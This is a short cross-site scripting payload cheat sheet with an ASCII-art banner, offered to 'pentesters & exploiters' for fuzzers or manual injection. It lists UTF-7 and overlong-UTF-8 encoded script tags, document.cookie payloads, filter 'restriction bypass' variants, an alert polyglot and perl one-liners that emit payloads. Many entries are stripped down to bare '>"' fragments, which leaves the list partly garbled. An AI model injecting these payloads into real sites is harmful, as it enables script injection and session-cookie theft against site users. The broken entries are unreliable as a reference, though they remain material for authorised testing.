_________ _________.__ __ _________ .__ __ .__ \_ ___ \_______ ____ ______ ______ / _____/|__|/ |_ ____ / _____/ ___________|__|______/ |_|__| ____ ____ / \ \/\_ __ \/ _ \/ ___// ___/ \_____ \ | \ __\/ __ \ \_____ \_/ ___\_ __ \ \____ \ __\ |/ \ / ___\ \ \____| | \( <_> )___ \ \___ \ / \| || | \ ___/ / \ \___| | \/ | |_> > | | | | \/ /_/ > \______ /|__| \____/____ >____ > /_______ /|__||__| \___ > /_______ /\___ >__| |__| __/|__| |__|___| /\___ / \/ \/ \/ \/ \/ \/ \/ |__| \//_____/ Information: A lot of people asked us regarding our cross site scripting pentest sheet for a fuzzers or own scripts. To have some good results you can use the following list with automatic scripts, software or manual payloads. This list goes out to all friends, nerds, pentester & exploiters. Please continue the list or contribute to update. Note: This is a technical attack sheet for cross site scripting penetration-tests. XSS Strings:
exp/* ]] document.cookie=true'); ?> +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
& &{document.cookie=true;};
< ;
]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Restriction Bypass: >" >" >" >"
>"
>"
>"
>" >" >" >"exp/* >" >" >" >" >" >" >"]] >" >" >"document.cookie=true'); ?> >" +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- >" >"
>" >" >" >" >"& >"&{document.cookie=true;}; >" >" >" >" >" >" >"
>"
>"
>"
>" >" >" >"< >" >" >" >" >" >"; >"
]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Others: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> '';!--"=&{()} "> perl -e 'print "";' > out perl -e 'print "alert(\"XSS\")";' > out < \";alert('XSS');//